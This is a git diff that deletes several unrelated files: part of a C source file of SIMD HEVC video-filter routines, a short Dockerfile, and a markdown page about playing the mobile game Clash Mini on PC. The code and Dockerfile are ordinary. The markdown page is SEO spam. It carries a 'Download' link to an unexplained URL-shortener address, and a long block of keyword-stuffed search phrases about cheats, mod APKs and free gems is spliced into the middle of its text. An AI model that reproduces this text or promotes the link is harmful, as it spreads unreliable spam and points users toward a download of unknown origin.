filt0, filt1, dst6, dst6); - dst7 = const_vec; - DPADD_SB2_SH(vec14, vec15, filt0, filt1, dst7, dst7); - dst8 = const_vec; - DPADD_SB2_SH(vec16, vec17, filt0, filt1, dst8, dst8); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst2, dst1, dst21_r, dst21_l); - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst4, dst3, dst43_r, dst43_l); - ILVRL_H2_SH(dst5, dst4, dst54_r, dst54_l); - ILVRL_H2_SH(dst6, dst5, dst65_r, dst65_l); - ILVRL_H2_SH(dst7, dst6, dst76_r, dst76_l); - ILVRL_H2_SH(dst8, dst7, dst87_r, dst87_l); - - dst0_r = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst0_l = HEVC_FILT_4TAP(dst10_l, dst32_l, filt_h0, filt_h1); - dst1_r = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst1_l = HEVC_FILT_4TAP(dst21_l, dst43_l, filt_h0, filt_h1); - dst2_r = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - dst2_l = HEVC_FILT_4TAP(dst32_l, dst54_l, filt_h0, filt_h1); - dst3_r = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - dst3_l = HEVC_FILT_4TAP(dst43_l, dst65_l, filt_h0, filt_h1); - dst4_r = HEVC_FILT_4TAP(dst54_r, dst76_r, filt_h0, filt_h1); - dst4_l = HEVC_FILT_4TAP(dst54_l, dst76_l, filt_h0, filt_h1); - dst5_r = HEVC_FILT_4TAP(dst65_r, dst87_r, filt_h0, filt_h1); - dst5_l = HEVC_FILT_4TAP(dst65_l, dst87_l, filt_h0, filt_h1); - - SRA_4V(dst0_r, dst0_l, dst1_r, dst1_l, 6); - SRA_4V(dst2_r, dst2_l, dst3_r, dst3_l, 6); - SRA_4V(dst4_r, dst4_l, dst5_r, dst5_l, 6); - - PCKEV_H4_SW(dst0_l, dst0_r, dst1_l, dst1_r, - dst2_l, dst2_r, dst3_l, dst3_r, dst0_r, dst1_r, dst2_r, dst3_r); - PCKEV_H2_SW(dst4_l, dst4_r, dst5_l, dst5_r, dst4_r, dst5_r); - - ST_SW2(dst0_r, dst1_r, dst, dst_stride); - dst += (2 * dst_stride); - ST_SW2(dst2_r, dst3_r, dst, dst_stride); - dst += (2 * dst_stride); - ST_SW2(dst4_r, dst5_r, dst, dst_stride); -} - -static void hevc_hv_4t_8multx4mult_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height, - int32_t width8mult) -{ - uint32_t loop_cnt, cnt; - const uint8_t *src_tmp; - int16_t *dst_tmp; - v16i8 src0, src1, src2, src3, src4, src5, src6; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6; - v4i32 dst0_r, dst0_l, dst1_r, dst1_l, dst2_r, dst2_l, dst3_r, dst3_l; - v8i16 dst10_r, dst32_r, dst54_r, dst21_r, dst43_r, dst65_r; - v8i16 dst10_l, dst32_l, dst54_l, dst21_l, dst43_l, dst65_l; - - src -= (src_stride + 1); - - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (cnt = width8mult; cnt--;) { - src_tmp = src; - dst_tmp = dst; - - LD_SB3(src_tmp, src_stride, src0, src1, src2); - src_tmp += (3 * src_stride); - - XORI_B3_128_SB(src0, src1, src2); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec4, vec5); - - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - dst1 = const_vec; - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst1, dst1); - dst2 = const_vec; - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst2, dst2); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst2, dst1, dst21_r, dst21_l); - - for (loop_cnt = height >> 2; loop_cnt--;) { - LD_SB4(src_tmp, src_stride, src3, src4, src5, src6); - src_tmp += (4 * src_stride); - XORI_B4_128_SB(src3, src4, src5, src6); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec6, vec7); - - dst3 = const_vec; - dst4 = const_vec; - dst5 = const_vec; - dst6 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst4, dst4); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst5, dst5); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst6, dst6); - - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst4, dst3, dst43_r, dst43_l); - ILVRL_H2_SH(dst5, dst4, dst54_r, dst54_l); - ILVRL_H2_SH(dst6, dst5, dst65_r, dst65_l); - - dst0_r = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst0_l = HEVC_FILT_4TAP(dst10_l, dst32_l, filt_h0, filt_h1); - dst1_r = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst1_l = HEVC_FILT_4TAP(dst21_l, dst43_l, filt_h0, filt_h1); - dst2_r = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - dst2_l = HEVC_FILT_4TAP(dst32_l, dst54_l, filt_h0, filt_h1); - dst3_r = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - dst3_l = HEVC_FILT_4TAP(dst43_l, dst65_l, filt_h0, filt_h1); - - SRA_4V(dst0_r, dst0_l, dst1_r, dst1_l, 6); - SRA_4V(dst2_r, dst2_l, dst3_r, dst3_l, 6); - - PCKEV_H4_SW(dst0_l, dst0_r, dst1_l, dst1_r, - dst2_l, dst2_r, dst3_l, dst3_r, - dst0_r, dst1_r, dst2_r, dst3_r); - - ST_SW4(dst0_r, dst1_r, dst2_r, dst3_r, dst_tmp, dst_stride); - dst_tmp += (4 * dst_stride); - - dst10_r = dst54_r; - dst10_l = dst54_l; - dst21_r = dst65_r; - dst21_l = dst65_l; - dst2 = dst6; - } - - src += 8; - dst += 8; - } -} - -static void hevc_hv_4t_8w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - - if (2 == height) { - hevc_hv_4t_8x2_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y); - } else if (4 == height) { - hevc_hv_4t_8multx4_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, 1); - } else if (6 == height) { - hevc_hv_4t_8x6_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y); - } else if (0 == (height % 4)) { - hevc_hv_4t_8multx4mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 1); - } -} - -static void hevc_hv_4t_12w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - uint32_t loop_cnt; - const uint8_t *src_tmp; - int16_t *dst_tmp; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v16i8 mask0, mask1, mask2, mask3; - v8i16 filt0, filt1, filt_h0, filt_h1, filter_vec, const_vec; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst10, dst21, dst22, dst73; - v8i16 dst84, dst95, dst106, dst76_r, dst98_r, dst87_r, dst109_r; - v8i16 dst10_r, dst32_r, dst54_r, dst21_r, dst43_r, dst65_r; - v8i16 dst10_l, dst32_l, dst54_l, dst21_l, dst43_l, dst65_l; - v4i32 dst0_r, dst0_l, dst1_r, dst1_l, dst2_r, dst2_l, dst3_r, dst3_l; - v4i32 tmp0, tmp1, tmp2, tmp3, tmp4, tmp5, tmp6, tmp7; - - src -= (src_stride + 1); - - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask0 = LD_SB(ff_hevc_mask_arr); - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - src_tmp = src; - dst_tmp = dst; - - LD_SB3(src_tmp, src_stride, src0, src1, src2); - src_tmp += (3 * src_stride); - - XORI_B3_128_SB(src0, src1, src2); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec4, vec5); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst1, dst1); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst2, dst2); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst2, dst1, dst21_r, dst21_l); - - for (loop_cnt = 4; loop_cnt--;) { - LD_SB4(src_tmp, src_stride, src3, src4, src5, src6); - src_tmp += (4 * src_stride); - XORI_B4_128_SB(src3, src4, src5, src6); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec6, vec7); - - dst3 = const_vec; - dst4 = const_vec; - dst5 = const_vec; - dst6 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst4, dst4); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst5, dst5); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst6, dst6); - - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst4, dst3, dst43_r, dst43_l); - ILVRL_H2_SH(dst5, dst4, dst54_r, dst54_l); - ILVRL_H2_SH(dst6, dst5, dst65_r, dst65_l); - - dst0_r = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst0_l = HEVC_FILT_4TAP(dst10_l, dst32_l, filt_h0, filt_h1); - dst1_r = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst1_l = HEVC_FILT_4TAP(dst21_l, dst43_l, filt_h0, filt_h1); - dst2_r = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - dst2_l = HEVC_FILT_4TAP(dst32_l, dst54_l, filt_h0, filt_h1); - dst3_r = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - dst3_l = HEVC_FILT_4TAP(dst43_l, dst65_l, filt_h0, filt_h1); - - SRA_4V(dst0_r, dst0_l, dst1_r, dst1_l, 6); - SRA_4V(dst2_r, dst2_l, dst3_r, dst3_l, 6); - PCKEV_H4_SW(dst0_l, dst0_r, dst1_l, dst1_r, dst2_l, dst2_r, dst3_l, - dst3_r, dst0_r, dst1_r, dst2_r, dst3_r); - ST_SW4(dst0_r, dst1_r, dst2_r, dst3_r, dst_tmp, dst_stride); - dst_tmp += (4 * dst_stride); - - dst10_r = dst54_r; - dst10_l = dst54_l; - dst21_r = dst65_r; - dst21_l = dst65_l; - dst2 = dst6; - } - - src += 8; - dst += 8; - - mask2 = LD_SB(ff_hevc_mask_arr + 16); - mask3 = mask2 + 2; - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - VSHF_B2_SB(src0, src1, src0, src1, mask2, mask3, vec0, vec1); - VSHF_B2_SB(src1, src2, src1, src2, mask2, mask3, vec2, vec3); - dst10 = const_vec; - dst21 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst10, dst10); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst21, dst21); - ILVRL_H2_SH(dst21, dst10, dst10_r, dst21_r); - dst22 = (v8i16) __msa_splati_d((v2i64) dst21, 1); - - for (loop_cnt = 2; loop_cnt--;) { - LD_SB8(src, src_stride, src3, src4, src5, src6, src7, src8, src9, - src10); - src += (8 * src_stride); - XORI_B8_128_SB(src3, src4, src5, src6, src7, src8, src9, src10); - VSHF_B2_SB(src3, src7, src3, src7, mask2, mask3, vec0, vec1); - VSHF_B2_SB(src4, src8, src4, src8, mask2, mask3, vec2, vec3); - VSHF_B2_SB(src5, src9, src5, src9, mask2, mask3, vec4, vec5); - VSHF_B2_SB(src6, src10, src6, src10, mask2, mask3, vec6, vec7); - - dst73 = const_vec; - dst84 = const_vec; - dst95 = const_vec; - dst106 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst73, dst73); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst84, dst84); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst95, dst95); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst106, dst106); - - dst32_r = __msa_ilvr_h(dst73, dst22); - ILVRL_H2_SH(dst84, dst73, dst43_r, dst87_r); - ILVRL_H2_SH(dst95, dst84, dst54_r, dst98_r); - ILVRL_H2_SH(dst106, dst95, dst65_r, dst109_r); - dst22 = (v8i16) __msa_splati_d((v2i64) dst73, 1); - dst76_r = __msa_ilvr_h(dst22, dst106); - - tmp0 = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - tmp1 = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - tmp2 = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - tmp3 = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - tmp4 = HEVC_FILT_4TAP(dst54_r, dst76_r, filt_h0, filt_h1); - tmp5 = HEVC_FILT_4TAP(dst65_r, dst87_r, filt_h0, filt_h1); - tmp6 = HEVC_FILT_4TAP(dst76_r, dst98_r, filt_h0, filt_h1); - tmp7 = HEVC_FILT_4TAP(dst87_r, dst109_r, filt_h0, filt_h1); - - SRA_4V(tmp0, tmp1, tmp2, tmp3, 6); - SRA_4V(tmp4, tmp5, tmp6, tmp7, 6); - PCKEV_H4_SW(tmp1, tmp0, tmp3, tmp2, tmp5, tmp4, tmp7, tmp6, tmp0, tmp1, - tmp2, tmp3); - ST_D8(tmp0, tmp1, tmp2, tmp3, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - - dst10_r = dst98_r; - dst21_r = dst109_r; - dst22 = (v8i16) __msa_splati_d((v2i64) dst106, 1); - } -} - -static void hevc_hv_4t_16w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - if (4 == height) { - hevc_hv_4t_8multx4_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, 2); - } else { - hevc_hv_4t_8multx4mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 2); - } -} - -static void hevc_hv_4t_24w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - hevc_hv_4t_8multx4mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 3); -} - -static void hevc_hv_4t_32w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - hevc_hv_4t_8multx4mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 4); -} - -#define MC_COPY(WIDTH) \ -void ff_hevc_put_hevc_pel_pixels##WIDTH##_8_msa(int16_t *dst, \ - const uint8_t *src, \ - ptrdiff_t src_stride, \ - int height, \ - intptr_t mx, \ - intptr_t my, \ - int width) \ -{ \ - hevc_copy_##WIDTH##w_msa(src, src_stride, dst, MAX_PB_SIZE, height); \ -} - -MC_COPY(4); -MC_COPY(6); -MC_COPY(8); -MC_COPY(12); -MC_COPY(16); -MC_COPY(24); -MC_COPY(32); -MC_COPY(48); -MC_COPY(64); - -#undef MC_COPY - -#define MC(PEL, DIR, WIDTH, TAP, DIR1, FILT_DIR) \ -void ff_hevc_put_hevc_##PEL##_##DIR##WIDTH##_8_msa(int16_t *dst, \ - const uint8_t *src, \ - ptrdiff_t src_stride, \ - int height, \ - intptr_t mx, \ - intptr_t my, \ - int width) \ -{ \ - const int8_t *filter = ff_hevc_##PEL##_filters[FILT_DIR - 1]; \ - \ - hevc_##DIR1##_##TAP##t_##WIDTH##w_msa(src, src_stride, dst, \ - MAX_PB_SIZE, filter, height); \ -} - -MC(qpel, h, 4, 8, hz, mx); -MC(qpel, h, 8, 8, hz, mx); -MC(qpel, h, 12, 8, hz, mx); -MC(qpel, h, 16, 8, hz, mx); -MC(qpel, h, 24, 8, hz, mx); -MC(qpel, h, 32, 8, hz, mx); -MC(qpel, h, 48, 8, hz, mx); -MC(qpel, h, 64, 8, hz, mx); - -MC(qpel, v, 4, 8, vt, my); -MC(qpel, v, 8, 8, vt, my); -MC(qpel, v, 12, 8, vt, my); -MC(qpel, v, 16, 8, vt, my); -MC(qpel, v, 24, 8, vt, my); -MC(qpel, v, 32, 8, vt, my); -MC(qpel, v, 48, 8, vt, my); -MC(qpel, v, 64, 8, vt, my); - -MC(epel, h, 4, 4, hz, mx); -MC(epel, h, 6, 4, hz, mx); -MC(epel, h, 8, 4, hz, mx); -MC(epel, h, 12, 4, hz, mx); -MC(epel, h, 16, 4, hz, mx); -MC(epel, h, 24, 4, hz, mx); -MC(epel, h, 32, 4, hz, mx); - -MC(epel, v, 4, 4, vt, my); -MC(epel, v, 6, 4, vt, my); -MC(epel, v, 8, 4, vt, my); -MC(epel, v, 12, 4, vt, my); -MC(epel, v, 16, 4, vt, my); -MC(epel, v, 24, 4, vt, my); -MC(epel, v, 32, 4, vt, my); - -#undef MC - -#define MC_HV(PEL, WIDTH, TAP) \ -void ff_hevc_put_hevc_##PEL##_hv##WIDTH##_8_msa(int16_t *dst, \ - const uint8_t *src, \ - ptrdiff_t src_stride, \ - int height, \ - intptr_t mx, \ - intptr_t my, \ - int width) \ -{ \ - const int8_t *filter_x = ff_hevc_##PEL##_filters[mx - 1]; \ - const int8_t *filter_y = ff_hevc_##PEL##_filters[my - 1]; \ - \ - hevc_hv_##TAP##t_##WIDTH##w_msa(src, src_stride, dst, MAX_PB_SIZE, \ - filter_x, filter_y, height); \ -} - -MC_HV(qpel, 4, 8); -MC_HV(qpel, 8, 8); -MC_HV(qpel, 12, 8); -MC_HV(qpel, 16, 8); -MC_HV(qpel, 24, 8); -MC_HV(qpel, 32, 8); -MC_HV(qpel, 48, 8); -MC_HV(qpel, 64, 8); - -MC_HV(epel, 4, 4); -MC_HV(epel, 6, 4); -MC_HV(epel, 8, 4); -MC_HV(epel, 12, 4); -MC_HV(epel, 16, 4); -MC_HV(epel, 24, 4); -MC_HV(epel, 32, 4); - -#undef MC_HV diff --git a/spaces/competitions/news-unmasked/Dockerfile b/spaces/competitions/news-unmasked/Dockerfile deleted file mode 100644 index 0afc086eedf9fcd5a42adf6b9682cdb15d73a410..0000000000000000000000000000000000000000 --- a/spaces/competitions/news-unmasked/Dockerfile +++ /dev/null @@ -1,2 +0,0 @@ -FROM huggingface/competitions:latest -CMD competitions run \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Download Clash Mini for PC and Lead Your Army of Minis into Battle.md b/spaces/congsaPfin/Manga-OCR/logs/Download Clash Mini for PC and Lead Your Army of Minis into Battle.md deleted file mode 100644 index dff49e469bd13cef5832dd7a00ea38d561992f09..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Download Clash Mini for PC and Lead Your Army of Minis into Battle.md +++ /dev/null @@ -1,172 +0,0 @@ - -

Clash Mini: A Fun and Strategy-Packed Board Game

-

If you are a fan of the Clash Universe, you will love Clash Mini, a new game from Supercell that lets you duel and rumble in a fun board game. Collect, summon, and upgrade your army of Minis, which are adorable versions of your favorite Clash characters, and watch them clash in exciting real-time battles. Predict your opponent's moves and assemble your winning strategy and formation. Lead your army with iconic Heroes such as Barbarian King, Archer Queen, Shield Maiden, and more. Change the tide of battle by swapping and upgrading your Minis in between rounds. Play casually for fun or in ranked matches to increase your league standing. Clash Mini is easy to learn but challenging to master. Get ready for your Minis to throw down the biggest rumble!

-

But what if you want to play Clash Mini on a bigger screen, with better controls, and more performance? Well, you can do that by playing Clash Mini on your PC. In this article, we will show you how to download and install Clash Mini on your PC, how to play it, and some tips and tricks to help you win more games.

-

clash mini download for pc


Download →→→ https://urlca.com/2uOeDy



-

How to Download and Install Clash Mini on Your PC

-

There are two main ways to play Clash Mini on your PC. One is to use Windows 11 and native Android emulation, which is the official way to run Android apps on Windows. The other is to use an Android emulator such as Bluestacks 5, which is a third-party software that simulates an Android device on your PC. Both methods have their pros and cons, so you can choose the one that suits you best.

-

Option 1: Use Windows 11 and native Android emulation

-

If you have a Windows 11 computer, you can use the native Android emulation feature that lets you run Android apps without needing to install a third-party emulator. This feature works by having the Windows Subsystem for Android, which is a virtualization instance of Android inside Windows. By having Android running inside Windows, you can directly have Android apps, including games, running on Windows.

-

To use this feature, you need to have a Windows 11 computer that meets the minimum requirements for running Android apps. You also need to have a Microsoft account and an Amazon account. Then, you need to follow these steps:

-
    -
  1. Open the Microsoft Store app on your PC and search for "Windows Subsystem for Android". Install it on your PC.
  2. -
  3. Open the Microsoft Store app again and search for "Amazon Appstore". Install it on your PC.
  4. -
  5. Open the Amazon Appstore app on your PC and sign in with your Amazon account.
  6. -
  7. Search for "Clash Mini" in the Amazon Appstore app and install it on your PC.
  8. -
  9. Open the Start menu on your PC and look for "Clash Mini ". Click on it to launch the game.
  10. -
-

Congratulations, you have successfully installed and run Clash Mini on your PC using Windows 11 and native Android emulation. You can now enjoy the game on a bigger screen, with better graphics, and faster performance. You can also use your mouse and keyboard or a controller to play the game.

-

Option 2: Use an Android emulator such as Bluestacks 5

-

If you don't have a Windows 11 computer, or you prefer to use a different method, you can use an Android emulator such as Bluestacks 5 to play Clash Mini on your PC. An Android emulator is a software that simulates an Android device on your PC, allowing you to run Android apps and games on your PC. Bluestacks 5 is one of the most popular and reliable Android emulators, with over 500 million users worldwide. It offers high performance, compatibility, customization, and security for playing Android games on PC.

-

To use this method, you need to have a PC that meets the minimum requirements for running Bluestacks 5. You also need to have a Google account. Then, you need to follow these steps:

-

How to play clash mini on pc with emulator
-Clash mini pc gameplay and review
-Best clash mini strategy and tips for pc players
-Clash mini download for windows 10/8/7
-Clash mini pc requirements and specifications
-Clash mini pc vs mobile comparison
-How to install clash mini on mac using bluestacks
-Clash mini pc cheats and hacks
-How to update clash mini on pc
-Clash mini pc keyboard and mouse controls
-How to fix clash mini not working on pc
-Clash mini pc online multiplayer mode
-How to transfer clash mini account from mobile to pc
-Clash mini pc mod apk download
-How to get free gems and coins in clash mini pc
-Clash mini pc best heroes and minis guide
-How to customize clash mini skins on pc
-Clash mini pc leagues and rankings system
-How to join or create a clan in clash mini pc
-Clash mini pc 1v1 and rumble mode tips
-How to unlock new minis and abilities in clash mini pc
-Clash mini pc graphics and sound settings
-How to record and stream clash mini gameplay on pc
-Clash mini pc troubleshooting and support
-How to play clash mini offline on pc
-Clash mini download for linux using wine
-Clash mini pc system requirements test
-Clash mini download size and installation time on pc
-Clash mini pc performance optimization guide
-How to backup and restore clash mini data on pc
-Clash mini download for chromebook using google play store
-Clash mini pc beginner's tutorial and walkthrough
-Clash mini download for macbook air/pro
-Clash mini pc patch notes and updates history
-How to uninstall clash mini from pc
-Clash mini download for windows xp/vista/7/8/8.1/10/11
-Clash mini download for mac os x/mojave/catalina/big sur/monterey
-Clash mini download for ubuntu/debian/fedora/mint/arch linux etc.
-Clash mini download for android emulator like ldplayer/memu/nox/bluestacks etc.
-Clash mini download for ios emulator like ipadian/smartface/appetize etc.
-How to play clash mini with friends on pc using discord/steam etc.
-How to get clash mini beta access on pc
-Clash mini download for surface pro/laptop/book/studio/go etc.
-How to play clash mini on multiple devices using one account
-How to get clash mini gift codes and redeem them on pc
-How to contact clash mini developers and give feedback on pc
-How to report bugs and glitches in clash mini on pc
-How to join clash mini community and forums on pc
-How to watch clash mini live streams and videos on pc
-How to get clash mini wallpapers and themes for pc

-
    -
  1. Go to the official website of Bluestacks 5 and download the installer for your PC.
  2. -
  3. Run the installer and follow the instructions to install Bluestacks 5 on your PC.
  4. -
  5. Open Bluestacks 5 and sign in with your Google account.
  6. -
  7. Go to the Google Play Store app on Bluestacks 5 and search for "Clash Mini". Install it on Bluestacks 5.
  8. -
  9. Go to the home screen of Bluestacks 5 and look for "Clash Mini". Click on it to launch the game.
  10. -
-

Congratulations, you have successfully installed and run Clash Mini on your PC using Bluestacks 5. You can now enjoy the game on a bigger screen, with better graphics, and faster performance. You can also use your mouse and keyboard or a controller to play the game.

-

How to Play Clash Mini on Your PC

-

Now that you have installed Clash Mini on your PC, you might be wondering how to play it. Well, don't worry, we have got you covered. Here are some basic steps and tips on how to play Clash Mini on your PC:

-

Choose your Minis and Heroes

-

The first thing you need to do is to choose your army of Minis and Heroes. Minis are cute versions of Clash characters that have different abilities and roles in battle. Heroes are powerful leaders that can boost your Minis and unleash special skills. You can collect Minis and Heroes by opening chests, completing quests, or buying them with gems. You can also upgrade them by using gold and cards.

-

You can have up to eight Minis and one Hero in your army. You can customize your army according to your preference and strategy. You can also create different decks for different modes and situations. To choose your Minis and Heroes, go to the Army tab in the main menu and drag and drop them into the slots. You can also tap on them to see their stats and abilities.

-

Arrange your army on the board

-

The next thing you need to do is to arrange your army on the board. The board is where the battles take place. It has nine tiles for each player, where you can place your Minis. The board also has obstacles that can block or affect your Minis' movements and attacks.

-

You can arrange your army on the board before each round of battle. You can drag and drop your Minis onto the tiles, or use the auto-arrange button to let the game do it for you. You can also swap or remove your Minis by dragging them back to the slots or tapping on them. You have a limited time to arrange your army, so be quick and smart.

-

Upgrade your Minis during battle

-

The third thing you need to do is to upgrade your Minis during battle. Upgrading your Minis can make them stronger, faster, or more durable. It can also unlock new abilities or effects for them. Upgrading your Minis can give you an edge over your opponent in battle.

-

You can upgrade your Minis during battle by using gold that you earn from defeating enemy Minis or from chests. You can upgrade up to three times per round, but each upgrade costs more gold than the previous one. To upgrade your Minis during battle, tap on the upgrade button at the bottom of the screen and select the Mini you want to upgrade.

-

Use your mouse and keyboard or a controller

-

The last thing you need to do is to use your mouse and keyboard or a controller to play the game. Playing Clash Mini on your PC gives you the advantage of having better controls and accuracy than playing on a mobile device. You can use your mouse and keyboard or a controller to interact with the game and perform various actions.

-

You can use your mouse to drag and drop your Minis on the board, to tap on buttons and menus, and to scroll and zoom in and out. You can use your keyboard to use shortcuts and hotkeys for faster and easier gameplay. You can also use a controller to play the game, as long as it is compatible with your PC and the game. You can customize your controls and settings in the Options menu in the game.

-

Tips and Tricks for Playing Clash Mini on Your PC

-

Now that you know how to play Clash Mini on your PC, you might be looking for some tips and tricks to improve your skills and win more games. Well, don't worry, we have got you covered. Here are some tips and tricks for playing Clash Mini on your PC:

-

Anticipate your opponent's moves

-

One of the most important skills in Clash Mini is to anticipate your opponent's moves and counter them. You need to pay attention to what Minis and Heroes your opponent has, how they arrange them on the board, and what abilities they use. You also need to remember what Minis they have upgraded or swapped during battle. By doing so, you can predict what they will do next and plan your strategy accordingly.

-

For example, if you see that your opponent has a lot of ranged Minis, you might want to place some tanky Minis in front of them to block their shots. If you see that your opponent has a Hero that can heal their Minis, you might want to focus on taking out that Hero first. If you see that your opponent has a Mini that can stun or freeze your Minis, you might want to spread out your Minis or use a Mini that can cleanse or immune them.

-

Adjust your strategy according to the mode

-

Another important skill in Clash Mini is to adjust your strategy according to the mode you are playing. There are different modes in Clash Mini, such as Casual, Ranked, Friendly, and Special Events. Each mode has different rules, objectives, rewards, and challenges. You need to adapt your strategy according to the mode you are playing and the situation you are facing.

-

For example, in Casual mode, you can play for fun and experiment with different Minis and Heroes without worrying about losing trophies or ranks. In Ranked mode, you need to play more seriously and competitively to climb up the leagues and earn rewards. In Friendly mode, you can play with or against your friends or clanmates for fun or practice. In Special Events mode, you can play with unique rules or modifiers that change the gameplay.

-

Experiment with different combinations and abilities

-

